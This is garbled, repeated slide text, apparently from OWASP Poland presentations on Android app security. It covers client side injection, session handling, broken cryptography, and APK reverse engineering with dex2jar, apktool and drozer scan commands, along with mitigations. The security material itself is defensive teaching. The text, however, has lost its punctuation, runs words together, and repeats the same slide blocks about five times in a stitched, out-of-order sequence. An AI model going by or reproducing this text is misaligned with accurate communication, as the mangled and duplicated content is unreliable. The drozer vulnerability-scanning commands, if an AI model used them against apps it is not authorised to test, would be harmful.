fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
